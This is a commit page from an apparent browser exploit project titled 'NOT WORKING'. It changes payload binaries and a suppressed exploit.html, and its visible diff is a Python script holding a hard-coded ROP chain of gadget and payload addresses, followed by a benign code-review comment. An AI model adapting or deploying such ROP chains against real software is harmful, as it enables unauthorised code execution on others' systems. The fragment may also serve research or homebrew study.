
NOT WORKING

Winbagility 1 year ago
parent
commit
e5f1d8658c
4 changed files with 9 additions and 3 deletions
  1. BIN
      payload/boot.elf
  2. BIN
      payload/boot_.elf
  3. 2
    2
      payload/exploit.html
  4. 7
    1
      ropChainToAsm.py

BIN
payload/boot.elf


BIN
payload/boot_.elf


+ 2
- 2
payload/exploit.html
File diff suppressed because it is too large


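--- a/ropChainToAsm.py
+++ b/ropChainToAsm.py
@@ -10,7 +10,13 @@
 # ropchain_appendu32(0x01800000)
 # in ropchainBuilder.html
 ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']
-ropChainAddresses = ['00000000', '00000001', '010204C8', '01023F88', '010240B0', '01035FC8', '010376C0', '0107DD70', '01080274', '01800000', 'FFFF2222', 'FFFF3333']
+
+#Generate a list of each value used in the ROP chain for optimization purposes
+#Cause no need to load the value in multiple times
+ropChainAddresses = []
+for i in ropChain:
+    if not i in ropChainAddresses:
+        ropChainAddresses.append(i)
 
 # Essentially, to avoid reloading the same hardcoded values too many times, load each value to r10 one at a time
 # then write it to all the locations it is used for. In some cases it uses r7 or r11 for payload address and size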
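Review bot: The dedup loop added at new lines 16–19 spells the membership test as `if not i in ropChainAddresses`, which PEP 8 writes as `if i not in ropChainAddresses`, and testing membership against a growing list makes the loop quadratic in the chain length. The whole loop collapses to one line that keeps the same first-seen order: `ropChainAddresses = list(dict.fromkeys(ropChain))`. Note that the removed hard-coded list was in sorted order while the generated one follows first occurrence in ropChain; `sorted(set(ropChain))` would reproduce the removed list exactly, so if the code below the hunk (outside this view) relies on that ordering, prefer that form and say so in the comment.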